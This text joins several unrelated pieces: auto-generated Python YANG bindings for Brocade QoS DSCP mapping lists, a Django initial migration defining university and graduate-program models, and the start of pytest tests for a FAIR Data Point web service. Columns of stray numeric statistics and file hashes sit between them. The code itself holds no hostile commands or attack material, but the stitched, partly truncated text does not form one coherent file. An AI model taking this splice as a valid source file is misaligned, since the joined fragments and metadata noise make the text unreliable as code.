        t = YANGDynClass(v,base=YANGListType("dscp_mutation_map_name",dscp_mutation.dscp_mutation, yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-mutation-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-Mutation map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_mutation', u'cli-mode-name': u'dscp-mutation-$(dscp-mutation-map-name)'}}), is_container='list', yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-Mutation map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_mutation', u'cli-mode-name': u'dscp-mutation-$(dscp-mutation-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
    except (TypeError, ValueError):
        # Surface a structured error describing the expected generated type.
        raise ValueError({
            'error-string': """dscp_mutation must be of a type compatible with list""",
            'defined-type': "list",
            'generated-type': """YANGDynClass(base=YANGListType("dscp_mutation_map_name",dscp_mutation.dscp_mutation, yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-mutation-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-Mutation map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_mutation', u'cli-mode-name': u'dscp-mutation-$(dscp-mutation-map-name)'}}), is_container='list', yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-Mutation map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_mutation', u'cli-mode-name': u'dscp-mutation-$(dscp-mutation-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)""",
        })
    self.__dscp_mutation = t
    # Notify a registered change hook, if the binding has one.
    if hasattr(self, '_set'):
        self._set()
def _unset_dscp_mutation(self):
    # Reset dscp_mutation to a fresh, empty generated list instance built
    # with the same schema arguments as the default.
    self.__dscp_mutation = YANGDynClass(base=YANGListType("dscp_mutation_map_name",dscp_mutation.dscp_mutation, yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-mutation-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-Mutation map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_mutation', u'cli-mode-name': u'dscp-mutation-$(dscp-mutation-map-name)'}}), is_container='list', yang_name="dscp-mutation", rest_name="dscp-mutation", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-Mutation map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_mutation', u'cli-mode-name': u'dscp-mutation-$(dscp-mutation-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
def _get_dscp_traffic_class(self):
    """Return the dscp_traffic_class list, mapped from YANG /qos/map/dscp_traffic_class (list)."""
    value = self.__dscp_traffic_class
    return value
def _set_dscp_traffic_class(self, v, load=False):
    """
    Setter method for dscp_traffic_class, mapped from YANG variable /qos/map/dscp_traffic_class (list)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_dscp_traffic_class is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_dscp_traffic_class() directly.
    """
    # Values wrapped in a pyangbind union-type helper are normalised first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the supplied value in the generated list type so it is
        # checked against the generated schema arguments for this list.
        t = YANGDynClass(v,base=YANGListType("dscp_traffic_class_map_name",dscp_traffic_class.dscp_traffic_class, yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-traffic-class-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_traffic_class', u'cli-mode-name': u'dscp-traffic-class-$(dscp-traffic-class-map-name)'}}), is_container='list', yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_traffic_class', u'cli-mode-name': u'dscp-traffic-class-$(dscp-traffic-class-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
    except (TypeError, ValueError):
        # Surface a structured error describing the expected generated type.
        raise ValueError({
            'error-string': """dscp_traffic_class must be of a type compatible with list""",
            'defined-type': "list",
            'generated-type': """YANGDynClass(base=YANGListType("dscp_traffic_class_map_name",dscp_traffic_class.dscp_traffic_class, yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-traffic-class-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_traffic_class', u'cli-mode-name': u'dscp-traffic-class-$(dscp-traffic-class-map-name)'}}), is_container='list', yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_traffic_class', u'cli-mode-name': u'dscp-traffic-class-$(dscp-traffic-class-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)""",
        })
    self.__dscp_traffic_class = t
    # Notify a registered change hook, if the binding has one.
    if hasattr(self, '_set'):
        self._set()
def _unset_dscp_traffic_class(self):
    # Reset dscp_traffic_class to a fresh, empty generated list instance built
    # with the same schema arguments as the default.
    self.__dscp_traffic_class = YANGDynClass(base=YANGListType("dscp_traffic_class_map_name",dscp_traffic_class.dscp_traffic_class, yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-traffic-class-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_traffic_class', u'cli-mode-name': u'dscp-traffic-class-$(dscp-traffic-class-map-name)'}}), is_container='list', yang_name="dscp-traffic-class", rest_name="dscp-traffic-class", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-to-Traffic-Class map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_traffic_class', u'cli-mode-name': u'dscp-traffic-class-$(dscp-traffic-class-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
def _get_dscp_cos(self):
    """Return the dscp_cos list, mapped from YANG /qos/map/dscp_cos (list)."""
    value = self.__dscp_cos
    return value
def _set_dscp_cos(self, v, load=False):
    """
    Setter method for dscp_cos, mapped from YANG variable /qos/map/dscp_cos (list)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_dscp_cos is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_dscp_cos() directly.
    """
    # Values wrapped in a pyangbind union-type helper are normalised first.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the supplied value in the generated list type so it is
        # checked against the generated schema arguments for this list.
        t = YANGDynClass(v,base=YANGListType("dscp_cos_map_name",dscp_cos.dscp_cos, yang_name="dscp-cos", rest_name="dscp-cos", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-cos-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-to-CoS map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_cos', u'cli-mode-name': u'dscp-cos-$(dscp-cos-map-name)'}}), is_container='list', yang_name="dscp-cos", rest_name="dscp-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-to-CoS map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_cos', u'cli-mode-name': u'dscp-cos-$(dscp-cos-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
    except (TypeError, ValueError):
        # Surface a structured error describing the expected generated type.
        raise ValueError({
            'error-string': """dscp_cos must be of a type compatible with list""",
            'defined-type': "list",
            'generated-type': """YANGDynClass(base=YANGListType("dscp_cos_map_name",dscp_cos.dscp_cos, yang_name="dscp-cos", rest_name="dscp-cos", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-cos-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-to-CoS map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_cos', u'cli-mode-name': u'dscp-cos-$(dscp-cos-map-name)'}}), is_container='list', yang_name="dscp-cos", rest_name="dscp-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-to-CoS map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_cos', u'cli-mode-name': u'dscp-cos-$(dscp-cos-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)""",
        })
    self.__dscp_cos = t
    # Notify a registered change hook, if the binding has one.
    if hasattr(self, '_set'):
        self._set()
def _unset_dscp_cos(self):
    # Reset dscp_cos to a fresh, empty generated list instance built with the
    # same schema arguments as the default.
    self.__dscp_cos = YANGDynClass(base=YANGListType("dscp_cos_map_name",dscp_cos.dscp_cos, yang_name="dscp-cos", rest_name="dscp-cos", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='dscp-cos-map-name', extensions={u'tailf-common': {u'info': u'Configure DSCP-to-CoS map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_cos', u'cli-mode-name': u'dscp-cos-$(dscp-cos-map-name)'}}), is_container='list', yang_name="dscp-cos", rest_name="dscp-cos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure DSCP-to-CoS map', u'cli-no-key-completion': None, u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'cli-full-command': None, u'callpoint': u'dscp_cos', u'cli-mode-name': u'dscp-cos-$(dscp-cos-map-name)'}}, namespace='urn:brocade.com:mgmt:brocade-qos-mls', defining_module='brocade-qos-mls', yang_type='list', is_config=True)
# Bind each YANG list to a Python property so attribute access (obj.cos_mutation,
# obj.dscp_cos, ...) routes through the generated getter/setter pairs above.
# NOTE(review): __builtin__.property (rather than bare `property`) is presumably
# used by the generator to avoid name shadowing — confirm against the file header.
cos_mutation = __builtin__.property(_get_cos_mutation, _set_cos_mutation)
cos_traffic_class = __builtin__.property(_get_cos_traffic_class, _set_cos_traffic_class)
traffic_class_cos = __builtin__.property(_get_traffic_class_cos, _set_traffic_class_cos)
dscp_mutation = __builtin__.property(_get_dscp_mutation, _set_dscp_mutation)
dscp_traffic_class = __builtin__.property(_get_dscp_traffic_class, _set_dscp_traffic_class)
dscp_cos = __builtin__.property(_get_dscp_cos, _set_dscp_cos)
# Registry of this container's YANG child elements; iterated by the generic
# copy/load logic in __init__ (see the _pyangbind_elements loop there).
_pyangbind_elements = {'cos_mutation': cos_mutation, 'cos_traffic_class': cos_traffic_class, 'traffic_class_cos': traffic_class_cos, 'dscp_mutation': dscp_mutation, 'dscp_traffic_class': dscp_traffic_class, 'dscp_cos': dscp_cos, }
| 125.279605
| 1,291
| 0.740029
| 5,937
| 38,085
| 4.55651
| 0.029645
| 0.039036
| 0.049682
| 0.05678
| 0.923703
| 0.90522
| 0.891912
| 0.890359
| 0.886589
| 0.884223
| 0
| 0.000174
| 0.093318
| 38,085
| 303
| 1,292
| 125.693069
| 0.783238
| 0.072496
| 0
| 0.453608
| 0
| 0.030928
| 0.522854
| 0.2413
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108247
| false
| 0
| 0.072165
| 0
| 0.298969
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c5f8ad45a5a715d8150932d38c7e245d91dff773
| 13,806
|
py
|
Python
|
src/university/migrations/0001_initial.py
|
Nikhilgupta18/practice-react_django
|
4226345a10c528308d13629907952e841621badc
|
[
"MIT"
] | null | null | null |
src/university/migrations/0001_initial.py
|
Nikhilgupta18/practice-react_django
|
4226345a10c528308d13629907952e841621badc
|
[
"MIT"
] | 11
|
2020-09-07T15:48:40.000Z
|
2022-03-08T23:06:16.000Z
|
src/university/migrations/0001_initial.py
|
Nikhilgupta18/practice-react_django
|
4226345a10c528308d13629907952e841621badc
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.1.5 on 2019-10-22 16:01
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the ``university`` app (auto-generated by Django 2.1.5).

    Creates the core models -- ``University``, per-discipline graduate-school
    profiles (business/engineering/law/medicine) and test-score tables
    (``GRE``/``MCAT``) -- then wires them together with one-to-one links.
    NOTE(review): this is a generated migration; do not hand-edit field
    definitions once it has been applied to a database.
    """

    # First migration of the app: nothing to depend on.
    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='BusinessGrad',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('enrollment', models.IntegerField(blank=True, default=None, null=True)),
                ('international', models.FloatField(blank=True, default=None, null=True)),
                ('male', models.FloatField(blank=True, default=None, null=True)),
                ('female', models.FloatField(blank=True, default=None, null=True)),
                ('acceptance_rate_masters', models.FloatField(blank=True, default=None, null=True)),
                ('acceptance_rate_phd', models.FloatField(blank=True, default=None, null=True)),
                ('us_application_fee', models.IntegerField(blank=True, default=None, null=True)),
                ('int_application_fee', models.IntegerField(blank=True, default=None, null=True)),
                ('tuition', models.FloatField(blank=True, default=None, null=True)),
                ('us_deadline', models.DateTimeField(blank=True, default=None, null=True)),
                ('int_deadline', models.DateTimeField(blank=True, default=None, null=True)),
                ('rolling', models.BooleanField(default=False)),
                ('gpa', models.FloatField(blank=True, default=None, null=True)),
                ('min_toefl_score', models.IntegerField(blank=True, default=None, null=True)),
                ('mean_toefl_score', models.IntegerField(blank=True, default=None, null=True)),
                ('min_ielts_score', models.FloatField(blank=True, default=None, null=True)),
                ('fin_aid_director_name', models.TextField(blank=True, default=None, null=True)),
                ('fin_aid_director_phone', models.TextField(blank=True, default=None, null=True)),
                ('fellowships', models.IntegerField(blank=True, default=None, null=True)),
                ('teaching_assistantships', models.IntegerField(blank=True, default=None, null=True)),
                ('research_assistantships', models.IntegerField(blank=True, default=None, null=True)),
                ('living_expenses', models.IntegerField(blank=True, default=None, null=True)),
                ('employed', models.FloatField(blank=True, default=None, null=True)),
                ('employed_3_months', models.FloatField(blank=True, default=None, null=True)),
                ('avg_work_ex_months', models.IntegerField(blank=True, default=None, null=True)),
                ('gmat', models.IntegerField(blank=True, default=None, null=True)),
                ('avg_salary', models.IntegerField(blank=True, default=None, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='EngineeringGrad',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('enrollment', models.IntegerField(blank=True, default=None, null=True)),
                ('us_application_fee', models.IntegerField(blank=True, default=None, null=True)),
                ('int_application_fee', models.IntegerField(blank=True, default=None, null=True)),
                ('international', models.FloatField(blank=True, default=None, null=True)),
                ('male', models.FloatField(blank=True, default=None, null=True)),
                ('female', models.FloatField(blank=True, default=None, null=True)),
                ('acceptance_rate_masters', models.FloatField(blank=True, default=None, null=True)),
                ('acceptance_rate_phd', models.FloatField(blank=True, default=None, null=True)),
                ('tuition', models.FloatField(blank=True, default=None, null=True)),
                ('us_deadline', models.DateTimeField(blank=True, default=None, null=True)),
                ('int_deadline', models.DateTimeField(blank=True, default=None, null=True)),
                ('rolling', models.BooleanField(default=False)),
                ('gpa', models.FloatField(blank=True, default=None, null=True)),
                ('min_toefl_score', models.IntegerField(blank=True, default=None, null=True)),
                ('mean_toefl_score', models.IntegerField(blank=True, default=None, null=True)),
                ('min_ielts_score', models.FloatField(blank=True, default=None, null=True)),
                ('fin_aid_director_name', models.TextField(blank=True, default=None, null=True)),
                ('fin_aid_director_phone', models.TextField(blank=True, default=None, null=True)),
                ('fellowships', models.IntegerField(blank=True, default=None, null=True)),
                ('teaching_assistantships', models.IntegerField(blank=True, default=None, null=True)),
                ('research_assistantships', models.IntegerField(blank=True, default=None, null=True)),
                ('living_expenses', models.IntegerField(blank=True, default=None, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='GRE',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('verbal', models.IntegerField(blank=True, default=None, null=True)),
                ('quant', models.IntegerField(blank=True, default=None, null=True)),
                ('awa', models.FloatField(blank=True, default=None, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='LawGrad',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('enrollment', models.IntegerField(blank=True, default=None, null=True)),
                ('international', models.FloatField(blank=True, default=None, null=True)),
                ('us_application_fee', models.IntegerField(blank=True, default=None, null=True)),
                ('int_application_fee', models.IntegerField(blank=True, default=None, null=True)),
                ('male', models.FloatField(blank=True, default=None, null=True)),
                ('female', models.FloatField(blank=True, default=None, null=True)),
                ('acceptance_rate', models.FloatField(blank=True, default=None, null=True)),
                ('tuition', models.FloatField(blank=True, default=None, null=True)),
                ('us_deadline', models.DateTimeField(blank=True, default=None, null=True)),
                ('int_deadline', models.DateTimeField(blank=True, default=None, null=True)),
                ('rolling', models.BooleanField(default=False)),
                ('int_rolling', models.BooleanField(default=False)),
                ('fin_aid_director_name', models.TextField(blank=True, default=None, null=True)),
                ('fin_aid_director_phone', models.TextField(blank=True, default=None, null=True)),
                ('students_receiving_aid', models.FloatField(blank=True, default=None, null=True)),
                ('gpa', models.FloatField(blank=True, default=None, null=True)),
                ('living_expenses', models.IntegerField(blank=True, default=None, null=True)),
                ('employed', models.FloatField(blank=True, default=None, null=True)),
                ('bar_passage_rate', models.FloatField(blank=True, default=None, null=True)),
                ('median_grant', models.IntegerField(blank=True, default=None, null=True)),
                ('lsat_score', models.IntegerField(blank=True, default=None, null=True)),
                ('median_public_salary', models.IntegerField(blank=True, default=None, null=True)),
                ('median_private_salary', models.IntegerField(blank=True, default=None, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='MCAT',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('old_total', models.IntegerField(blank=True, default=None, null=True)),
                ('new_total', models.IntegerField(blank=True, default=None, null=True)),
                ('chemical_physical', models.IntegerField(blank=True, default=None, null=True)),
                ('critical_analysis', models.IntegerField(blank=True, default=None, null=True)),
                ('biologic_biochemical', models.IntegerField(blank=True, default=None, null=True)),
                ('psycho_social_biological', models.IntegerField(blank=True, default=None, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='MedicineGrad',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('enrollment', models.IntegerField(blank=True, default=None, null=True)),
                ('international', models.FloatField(blank=True, default=None, null=True)),
                ('us_application_fee', models.IntegerField(blank=True, default=None, null=True)),
                ('int_application_fee', models.IntegerField(blank=True, default=None, null=True)),
                ('acceptance_rate_masters', models.FloatField(blank=True, default=None, null=True)),
                ('acceptance_rate_phd', models.FloatField(blank=True, default=None, null=True)),
                ('male', models.FloatField(blank=True, default=None, null=True)),
                ('female', models.FloatField(blank=True, default=None, null=True)),
                ('tuition', models.FloatField(blank=True, default=None, null=True)),
                ('us_deadline', models.DateTimeField(blank=True, default=None, null=True)),
                ('int_deadline', models.DateTimeField(blank=True, default=None, null=True)),
                ('rolling', models.BooleanField(default=False)),
                ('gpa', models.FloatField(blank=True, default=None, null=True)),
                ('fin_aid_director_name', models.TextField(blank=True, default=None, null=True)),
                ('fin_aid_director_phone', models.TextField(blank=True, default=None, null=True)),
                ('students_receiving_aid', models.FloatField(blank=True, default=None, null=True)),
                ('living_expenses', models.IntegerField(blank=True, default=None, null=True)),
                # MCAT scores live in their own table; one score set per program.
                ('mcat', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='university.MCAT')),
            ],
        ),
        migrations.CreateModel(
            name='University',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.TextField(default=None)),
                ('info_link', models.TextField(default=None, null=True)),
                ('rank', models.IntegerField(blank=True, default=None, null=True)),
                ('total_students', models.IntegerField(blank=True, default=None, null=True)),
                ('total_int_students', models.IntegerField(blank=True, default=None, null=True)),
                ('address', models.TextField(blank=True, default=None, null=True)),
                ('website', models.TextField(blank=True, default=None, max_length=500, null=True)),
                ('schools', models.TextField(blank=True, default=None, null=True)),
                ('uni_type', models.TextField(blank=True, default=None, null=True)),
                ('grad_school_link', models.TextField(blank=True, default=None, max_length=500, null=True)),
                ('undergrad_link', models.TextField(blank=True, default=None, max_length=500, null=True)),
                ('business_link', models.TextField(blank=True, default=None, max_length=500, null=True)),
                ('med_link', models.TextField(blank=True, default=None, max_length=500, null=True)),
                ('law_link', models.TextField(blank=True, default=None, max_length=500, null=True)),
                ('engg_link', models.TextField(blank=True, default=None, max_length=500, null=True)),
                ('slug', models.SlugField(blank=True, default=None, max_length=500, null=True)),
                ('logo', models.TextField(blank=True, default=None, max_length=500, null=True)),
            ],
        ),
        # FK fields added after both endpoints of each relation exist.
        migrations.AddField(
            model_name='medicinegrad',
            name='university',
            field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='university.University'),
        ),
        migrations.AddField(
            model_name='lawgrad',
            name='university',
            field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='university.University'),
        ),
        migrations.AddField(
            model_name='engineeringgrad',
            name='gre',
            field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='university.GRE'),
        ),
        migrations.AddField(
            model_name='engineeringgrad',
            name='university',
            field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='university.University'),
        ),
        migrations.AddField(
            model_name='businessgrad',
            name='gre',
            field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='university.GRE'),
        ),
        migrations.AddField(
            model_name='businessgrad',
            name='university',
            field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='university.University'),
        ),
    ]
| 67.676471
| 128
| 0.617268
| 1,456
| 13,806
| 5.741758
| 0.098214
| 0.144737
| 0.206699
| 0.258373
| 0.920574
| 0.91256
| 0.905144
| 0.902751
| 0.836124
| 0.773325
| 0
| 0.004079
| 0.236491
| 13,806
| 203
| 129
| 68.009852
| 0.789014
| 0.003259
| 0
| 0.709184
| 1
| 0
| 0.132495
| 0.036776
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.005102
| 0.010204
| 0
| 0.030612
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
a83a54edce83e37350bb8587106eae36c63db14f
| 14,056
|
py
|
Python
|
tests/test_endpoints.py
|
cffbots/fairdatapoint
|
6142b31408b5746d1a7e9f59e61735b7ad8bfde9
|
[
"Apache-2.0"
] | 9
|
2020-03-27T12:58:51.000Z
|
2021-01-21T16:22:46.000Z
|
tests/test_endpoints.py
|
MaastrichtU-IDS/fairdatapoint
|
f9f38903a629acbdb74a6a20014ac424cc3d3206
|
[
"Apache-2.0"
] | 26
|
2016-05-26T22:22:34.000Z
|
2020-02-13T07:12:37.000Z
|
tests/test_endpoints.py
|
MaastrichtU-IDS/fairdatapoint
|
f9f38903a629acbdb74a6a20014ac424cc3d3206
|
[
"Apache-2.0"
] | 4
|
2020-06-09T18:37:33.000Z
|
2020-12-16T08:05:01.000Z
|
import pytest
from fdp.fdp import create_app
@pytest.fixture(scope='class',
                params=[None, 'http://0.0.0.0:8890/sparql'],
                ids=['Memory Store', 'Persistent Store'])
def client(request):
    """Class-scoped HTTP test client, parametrized over both store backends."""
    application = create_app(host='0.0.0.0', port=80, graph_endpoint=request.param)
    with application.test_client() as http_client:
        yield http_client
# to make sure creating a new store when calling client
@pytest.fixture(scope='function', params=[None], ids=['Memory Store'])
def client_new_store(request):
    """Function-scoped client so each test starts from a brand-new (memory) store."""
    application = create_app(host='0.0.0.0', port=80, graph_endpoint=request.param)
    with application.test_client() as http_client:
        yield http_client
class TestBaseEndpointTests:
    '''All implementations of FDP should work for all endpoints.'''
    # datadir fixture provided via pytest-datadir-ng

    def test_fdp(self, client, datadir):
        """Testing post, get and put to fdp"""
        rv = client.post('/fdp', data=datadir['fdp.ttl'])
        assert rv.status_code == 200
        assert 'message' in rv.json
        assert rv.json['message'] == 'Ok'
        rv = client.get('/fdp')
        assert rv.status_code == 200
        assert 'Allow' in rv.headers
        assert 'GET' in rv.headers['Allow']
        assert rv.mimetype == 'text/turtle'
        assert b'hasVersion "0.1"' in rv.data
        assert b'metadataIssued "2019-04-09T10:01:00"^^xsd:dateTime' in rv.data
        # PUT replaces the metadata; the new version must be visible on re-read.
        rv = client.put('/fdp', data=datadir['fdp_update.ttl'])
        assert rv.status_code == 200
        assert 'message' in rv.json
        assert rv.json['message'] == 'Ok'
        rv = client.get('/fdp')
        assert rv.status_code == 200
        assert b'hasVersion "0.2"' in rv.data
        # DELETE is not allowed on the FDP layer itself.
        rv = client.delete('/fdp')
        assert rv.status_code == 405

    def test_fdp_invalid(self, client, datadir):
        """Test invalid metadata to fdp layer"""
        rv = client.post('/fdp', data=datadir['fdp_invalid_missingRDFtype.ttl'])
        assert rv.status_code == 405
        assert 'message' in rv.json
        assert 'Not found subject with required RDF type' in rv.json['message']
        rv = client.post('/fdp', data=datadir['fdp_invalid_wrongRDFtype.ttl'])
        assert rv.status_code == 405
        assert 'message' in rv.json
        assert 'Not found subject with required RDF type' in rv.json['message']
        rv = client.post('/fdp', data=datadir['fdp_invalid_blank.ttl'])
        assert rv.status_code == 405
        assert 'message' in rv.json
        assert 'Not found subject with required RDF type' in rv.json['message']
        # SHACL validation failures are surfaced in the error message.
        rv = client.post('/fdp', data=datadir['fdp_invalid_missingRequired.ttl'])
        assert rv.status_code == 405
        assert 'message' in rv.json
        assert 'Validation Report\nConforms: False\nResults (8)' in rv.json['message']
        rv = client.post('/fdp', data=datadir['fdp_invalid_unknownTerms.ttl'])
        assert rv.status_code == 405
        assert 'message' in rv.json
        assert 'Validation Report\nConforms: False\nResults (2)' in rv.json['message']
        rv = client.post('/fdp', data=datadir['fdp_invalid_2foucsNodes.ttl'])
        assert rv.status_code == 405
        assert 'message' in rv.json
        assert 'FDP layer allows only one subject' in rv.json['message']
        rv = client.post('/fdp', data=datadir['fdp_invalid_mixedMetadata.ttl'])
        assert rv.status_code == 405
        assert 'message' in rv.json
        assert 'Not allowed RDF type for layer FDP' in rv.json['message']

    def test_catalog(self, client, datadir):
        """Testing post, get, put and delete to catalog"""
        rv = client.post('/catalog', data=datadir['catalog01.ttl'])
        assert rv.status_code == 200
        assert rv.json['message'] == 'Ok'
        rv = client.post('/catalog', data=datadir['catalog02.ttl'])
        assert rv.status_code == 200
